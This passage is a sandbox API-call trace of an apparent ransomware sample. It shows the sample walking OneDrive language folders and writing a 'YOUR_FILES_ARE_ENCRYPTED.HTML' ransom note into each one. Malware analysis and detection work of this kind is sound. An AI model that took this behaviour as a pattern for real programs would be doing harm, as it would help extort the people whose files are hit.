returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo\\*" [0162.951] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacab5bb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacbe66b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacbe66b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, 
dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.951] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacab5bb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacbe66b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacbe66b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0162.951] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacbe66b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacbe66b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacbe66b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x116b0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.951] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.951] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.951] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.951] lstrlenW (lpString=".mui") returned 4 [0162.951] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.951] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacbe66b0, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xacbe66b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacbe66b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x116b0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.951] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.952] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\wo\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0162.952] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.954] CloseHandle (hObject=0x5b0) returned 1 [0162.954] GetProcessHeap () returned 0x270000 [0162.956] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.956] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacbe66b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacd171b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacd171b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="xh-za", cAlternateFileName="")) returned 1 [0162.956] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za") returned 77 [0162.956] GetProcessHeap () returned 0x270000 [0162.956] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.956] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za" [0162.956] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za\\*" [0162.956] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacbe66b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacd171b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacd171b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.958] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacbe66b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacd171b0, 
ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacd171b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0162.958] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacd171b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacd171b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacd3d310, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ab0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.958] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za\\FileSync.LocalizedResources.dll.mui") returned 113 [0162.959] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.959] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.959] lstrlenW (lpString=".mui") returned 4 [0162.959] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.959] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacd171b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacd171b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacd3d310, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ab0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) 
returned 0 [0162.959] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.964] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0162.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\xh-za\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0162.973] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0163.252] CloseHandle (hObject=0x5b0) returned 1 [0163.252] GetProcessHeap () returned 0x270000 [0163.253] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0163.263] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacd3d310, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad0a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad0a92b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="yo-ng", cAlternateFileName="")) returned 1 [0163.263] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng") returned 77 [0163.263] GetProcessHeap () returned 0x270000 [0163.263] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0163.265] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng" [0163.265] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng\\*" [0163.265] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacd3d310, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad0a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad0a92b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0163.266] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacd3d310, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad0a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad0a92b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0163.267] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: 
lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad0a92b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad0a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad0cf410, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122a8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0163.267] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng\\FileSync.LocalizedResources.dll.mui") returned 113 [0163.267] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.267] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.267] lstrlenW (lpString=".mui") returned 4 [0163.267] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.267] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad0a92b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad0a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad0cf410, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122a8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0163.267] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0163.267] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0163.267] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\yo-ng\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0163.268] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0163.270] CloseHandle (hObject=0x5b0) returned 1 [0163.271] GetProcessHeap () returned 0x270000 [0163.272] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0163.272] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad0cf410, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad226070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad226070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="zh-cn", cAlternateFileName="")) returned 1 [0163.272] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn") returned 77 [0163.272] GetProcessHeap () returned 0x270000 [0163.272] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0163.272] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn" [0163.272] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn\\*" [0163.272] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad0cf410, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad226070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad226070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0163.277] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad0cf410, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad226070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad226070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0163.277] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad226070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad226070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad226070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, 
nFileSizeLow=0xbea8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0163.277] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn\\FileSync.LocalizedResources.dll.mui") returned 113 [0163.277] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.277] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.277] lstrlenW (lpString=".mui") returned 4 [0163.277] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.277] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad226070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad226070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad226070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xbea8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0163.277] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0163.278] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0163.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\zh-cn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0163.278] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0163.281] CloseHandle (hObject=0x5b0) returned 1 [0163.281] GetProcessHeap () returned 0x270000 [0163.282] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0163.282] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad226070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad356b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad356b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="zh-tw", cAlternateFileName="")) returned 1 [0163.282] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw") returned 77 [0163.282] GetProcessHeap () returned 0x270000 [0163.282] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0163.282] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw" [0163.282] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw\\*" [0163.282] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad226070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad356b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad356b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0163.283] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad226070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad356b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad356b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0163.283] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad356b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad356b70, 